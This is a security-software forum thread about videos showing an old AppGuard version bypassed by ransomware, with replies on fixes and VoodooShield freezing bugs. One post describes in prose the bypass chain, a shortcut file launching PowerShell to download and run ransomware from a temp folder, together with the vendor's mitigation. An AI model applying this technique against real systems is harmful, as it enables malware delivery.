App Review AppGuard bypassed (old version)

[Evjl's Rain]

Hi everyone, I was searching the internet and I found these videos from F4zzx. Both videos show that Appguard was bypassed/failed to protect his virtual PC against ransomwares

I have never tried AppGuard and I'm not the author so please don't hit me
Just comment what you think about the videos

 

[Evjl's Rain]

because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malwares or ransomwares. It's better to have at least an AV, any of them, then signature-less solutions

 

[XhenEd]

I think powershell and wscript were used and abused.

@hjlbx

 

[hjlbx]

The video is a test of 4.3.1.3 - which has since been fixed. The current versions are 4.4.6.1 (AppGuard Professional) and 5.X.X.X (AppGuard Personal)

The malware uses a *.lnk file with an argument that points to Powershell. Powershell then downloads the ransomware from the net and writes it to c:\windows\temp and then executes it. I cannot recall, but I think a *.wfs file (wscript) is used as well. This video publisher posted two such scenarios - and I cannot remember the exact details of each - but both involved *.lnk files.

Malicious attacks using *.lnk files is not a common method, but I have seen it done.

BRN solved the issue in version 4.4 by adding Powershell to Guarded Apps and also blocking *.wfs files by default. Guarded Apps cannot write to c:\windows\temp. So an attack using Powershell as shown in the video is not possible with the current consumer versions.

* * * * *

I have submitted formal enhancements to have:

1. Powershell completely disabled by default in the consumer (non-Enterprise) versions of AppGuard
2. A generic protection against malicious *.lnk files with arguments; writable directories in System Space are to be treated the same as User Space

What 2 means is that a malicious *.lnk file with an argument can abuse a vulnerable Windows process not on the Guarded Apps list to download a malicious file, write it to any System Space directory that the OS allows, but AppGuard will block all executions from those directories.

This is the most effective way to do it without breaking anything...

Also, the way I have requested 2, it eliminates the need to add every vulnerable Windows process to the Guarded Apps list. Adding all vulnerable Windows processes can still be done - in order to mitigate an exploit attack - which is unrelated to the attack shown in the video - earlier in the run sequence - but there is no absolute need to do it.

 

[_CyberGhosT_]

because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malwares or ransomwares. It's better to have at least an AV, any of them, then signature-less solutions

Not very familiar with VoodooShield are ya ?

 

[_CyberGhosT_]

The video is a test of 4.3.1.3 - which has since been fixed. The current versions are 4.4.6.1 (AppGuard Professional) and 5.X.X.X (AppGuard Personal)

The malware uses a *.lnk file with an argument that points to Powershell. Powershell then downloads the ransomware from the net and writes it to c:\windows\temp and then executes it. I cannot recall, but I think a *.wfs file (wscript) is used as well. This video publisher posted two such scenarios - and I cannot remember the exact details of each - but both involved *.lnk files.

Malicious attacks using *.lnk files is not a common method, but I have seen it done.

BRN solved the issue in version 4.4 by adding Powershell to Guarded Apps and also blocking *.wfs files by default. Guarded Apps cannot write to c:\windows\temp. So an attack using Powershell as shown in the video is not possible with the current consumer versions.

* * * * *

I have submitted formal enhancements to have:

1. Powershell completely disabled by default in the consumer (non-Enterprise) versions of AppGuard
2. A generic protection against malicious *.lnk files with arguments; writable directories in System Space are to be treated the same as User Space

What 2 means is that a malicious *.lnk file with an argument can abuse a vulnerable Windows process not on the Guarded Apps list to download a malicious file, write it to any System Space directory that the OS allows, but AppGuard will block all executions from those directories.

This is the most effective way to do it without breaking anything...

Also, the way I have requested 2, it eliminates the need to add every vulnerable Windows process to the Guarded Apps list. Adding all vulnerable Windows processes can still be done - in order to mitigate an exploit attack - which is unrelated to the attack shown in the video - earlier in the run sequence - but there is no absolute need to do it.

Thanks for this clear and concise explanation @hjlbx , I am getting very interested in AppGuard as of late.

 

[Evjl's Rain]

Not very familiar with VoodooShield are ya ?

I was using VS for a few months then uninstalled it because of the annoying freezing bug which became more frequent each time I updated to a newer version. I'm watching wilders thread and they still say it still freezes
VS was great but nothing is perfect. who knows if any script can bypass VS
Your setup is almost impenetrable in real daily usage but in a happy day, you allow something and it can bypass 3 of your apps especially when you allow it by VS

 

[_CyberGhosT_]

I was using VS for a few months then uninstalled it because of the annoying freezing bug which became more frequent each time I updated to a newer version. I'm watching wilders thread and they still say it still freezes
VS was great but nothing is perfect. who knows if any script can bypass VS
Your setup is almost impenetrable in real daily usage but in a happy day, you allow something and it can bypass 3 of your apps especially when you allow it by VS

Right, in the wrong hands any "user" can render a solid config useless. The freezing issue is sad, I have used VS from the closed beta (2yrs now ?) and never had any "freezing"
after v3.4 I think. But I did read that Dan thinks its solved, I guess some system configs just wont run it. It's the flagship in my defense but it's not the only card up my sleeve.
I have this system locked down so tight with Process Lasso that it will take a very special malware author to get through here, even without VS. Keeping all your eggs in one basket
is foolhardy, and momma didn't raise one of those

 

[shmu26]

I was using VS for a few months then uninstalled it because of the annoying freezing bug which became more frequent each time I updated to a newer version. I'm watching wilders thread and they still say it still freezes
VS was great but nothing is perfect. who knows if any script can bypass VS
Your setup is almost impenetrable in real daily usage but in a happy day, you allow something and it can bypass 3 of your apps especially when you allow it by VS

I tested one of the latest builds of VS last week, and I found that when protection is active, it blocks execution of powershell and wscript.exe and cscript.exe. So that should provide a second layer of protection, even if the user mistakenly allowed a malicious file to execute.

I do agree with Evjl's Rain that there are some annoying bugs in VS that the dev has not succeeded in solving yet.

 

[Evjl's Rain]

Right, in the wrong hands any "user" can render a solid config useless. The freezing issue is sad, I have used VS from the closed beta (2yrs now ?) and never had any "freezing"
after v3.4 I think. But I did read that Dan thinks its solved, I guess some system configs just wont run it. It's the flagship in my defense but it's not the only card up my sleeve.
I have this system locked down so tight with Process Lasso that it will take a very special malware author to get through here, even without VS. Keeping all your eggs in one basket
is foolhardy, and momma didn't raise one of those

VS only freezes when you put your pc into sleep mode for a while and then wake it up. It froze very frequenly like this for me, sometimes it didn't freeze, otherwise it didn't freeze if my laptop was on the whole time

 

[hjlbx]

because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malwares or ransomwares. It's better to have at least an AV, any of them, then signature-less solutions

I can understand how you would think this, but if we both sat in front of a system with AppGuard installed and I explained and demonstrated how it functions -- I would bet in the end you'd think otherwise.

 

[_CyberGhosT_]

VS only freezes when you put your pc into sleep mode for a while and then wake it up. It froze very frequenly like this for me, sometimes it didn't freeze, otherwise it didn't freeze during if my laptop was on the whole time

Ahhh, that explains alot, I have Process Lasso set to keep my PC awake "Indefinitely"
If i'm going to be away for a long time I power it down. I may disable that option and
see if it does sleep if I get freezing. Maybe its not solved for me, just been avoided because
of my Lasso setting, very interesting.

 

[_CyberGhosT_]

This may be a solution that would fix your issue as well.
If you have Lasso set it to keep your PC awake by Right clicking
on the try icon and hovering over "Keep PC Awake" and Indefinitely
is one of the options

 

[Evjl's Rain]

This may be a solution that would fix your issue as well.
If you have Lasso set it to keep your PC awake by Right clicking
on the try icon and hovering over "Keep PC Awake" and Indefinitely
is one of the options

but this option will waste some power
I want my laptop to sleep

I will use VS again just in case I get 2-year giveaway license. Maybe VS freezes less frequently now

 

[DJ Panda]

No software is perfect. I use a layered approach of HIPs , AV, and an AM. Each one may be pretty good on its own but it is a good idea to be safe then sorry.

 

[Evjl's Rain]

I changed the title into "AppGuard bypassed (old version)". The newer version already fixed this problem as hjlbx said
These videos are only to prove "nothing is perfect"

 

[askmark]

but this option will waste some power
I want my laptop to sleep

I will use VS again just in case I get 2-year giveaway license. Maybe VS freezes less frequently now

I was getting fairly regular freezes (few times a week) on my laptop - sometimes after waking up, sometimes directly after logging in - but since 3.38 beta, I've not had a single freeze. Not sure if the problem is 100% resolved, but Dan (the author) is working tirelessly to eliminate the problem completely.

 

[hjlbx]

If VS freeze is connected to Sleep or Hibernation, then it is likely that it is a driver and\or hardware issue.

This would account for the fact that not every single VS user experiences the freeze; it appears to be system (driver\hardware) specific.

Has the developer requested post-freeze memory dumps from those users that experience it and made a comparison ?

That being said, it is possible that there are several things that cause the VS freeze - as opposed to one specific thing.

 

[askmark]

If VS freeze is connected to Sleep or Hibernation, then it is likely that it is a driver and\or hardware issue.

This would account for the fact that not every single VS user experiences the freeze; it appears to be system (driver\hardware) specific.

Has the developer requested post-freeze memory dumps from those users that experience it and made a comparison ?

That being said, it is possible that there are several things that cause the VS freeze - as opposed to one specific thing.

No memory dumps have been requested, although I have offered to send them. Dan has improved the freeze issue by identifying a memory leak, which occurred due to too many alerts appearing while the user was away and not being there to answer them. These alerts were causing VS to consume and not release a significant amount of heap memory. The memory problem has definitely been resolved as I've since measured VS's mem use using perfmon for a week and it never went above 100MB, despite forcing it to scan some really large files (some over 600MB).

What's left is a freeze issue that's not memory related. Personally, I think Dan needs to request system information from everyone who is experiencing the problem to see if they share a common hardware or software component.

 

[shmu26]

I think that people are not generally aware that SpyShelter functions as an anti-exe, and doesn't suffer from the bugs of VS. And it has multi-cloud look-up if you want a file rating.
You can install it without the intrusive keystroke hooks, as long as you are not super paranoid about keyloggers, and you can customize the trusted vendors and vulnerable processes to the level of sensitivity you want.
That's besides all the other system protections it does.